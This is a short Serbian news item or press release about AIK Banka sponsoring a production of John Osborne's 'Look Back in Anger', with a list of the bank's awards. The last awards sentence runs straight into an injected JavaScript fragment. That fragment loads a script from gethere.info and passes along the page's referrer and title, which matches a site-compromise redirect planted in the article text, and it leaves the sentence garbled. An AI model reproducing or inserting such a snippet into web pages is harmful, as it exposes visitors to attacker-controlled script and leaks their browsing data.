OSVRNI SE U GNEVU: AIK banka pokrovitelj društveno odgovorne predstave

OSVRNI SE U GNEVU: AIK banka pokrovitelj društveno odgovorne predstave


AIK Banka kao društveno-odgovorna institucija koja vodi računa o unapređenju zajednice i aktivno radi na promovisanju društvenih vrednosti, podržala je i omogućila  održavanje predstave „Osvrni se u gnevu“.

Reč je o predstavi čuvenog engleskog pisca Džona Ozborna, koja ima za cilj da probudi i izmesti publiku iz klasičnog koncepta života, jer je stavlja u ulogu neposrednog svedoka dramatične priče o životu, licemerju ljudi, potrazi za identitetom, slobodi ideja, usamljenosti i besu, promiskuitetu i preljubi. Neobična scena sobe koja simbolizuje život, uvući će gledaoce u neobičnu porodičnu sagu i srž pitanja – da li je dovoljni biti samo živ? Predstava se igra u staroj kući u Šafarikovoj 7, a uloge tumače Iva Stefanović, Miodrag Radonjić, Ivan Mihailović i Nina Janković, dok režiju potpisuje Nataša Radulović.

AIK Banka predstavlja snažan oslonac razvoju lokalne zajednice i doprinosi boljem kvalitetu života koji se ogleda u kontinuiranim ulaganjima i inovacijama, poštovanju najviših stepena profesionalnosti i poslovne etičnosti, uvažavanju svojih poslovnih partnera, klijenata i potrošača, pokazivanju ekološke svesti i brige o zaštiti životne sredine, kao i vođenju računa o širim društvenim pitanjima.

Priznanja za AIK banku

Prestižni britanski ekonomski magazin “International banker” je 2015. godine, pod pokroviteljstvom “Financial Times” u okviru svojih nagrada “Banking awards” dodelio AIK Banci dva priznanja: za najbolju komercijalnu banku u Srbiji i najinovativniju banku u sektoru rada sa stanovništvom. Pored toga, Evropsko poslovno veće, renomirana nezavisna korporacija ekonomske, socijalne i humanitarne saradnje, u okviru svojih nagrada “International Socrates Award Ceremony”, dodelila je AIK Banci priznanje za najbolju regionalnu instituciju, dok je Jelena Galić, predsednica Izvršnog odbora AIK Banke, proglašena menadžerom godine.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

+ Trenutno nema komentara

Dodajte komentar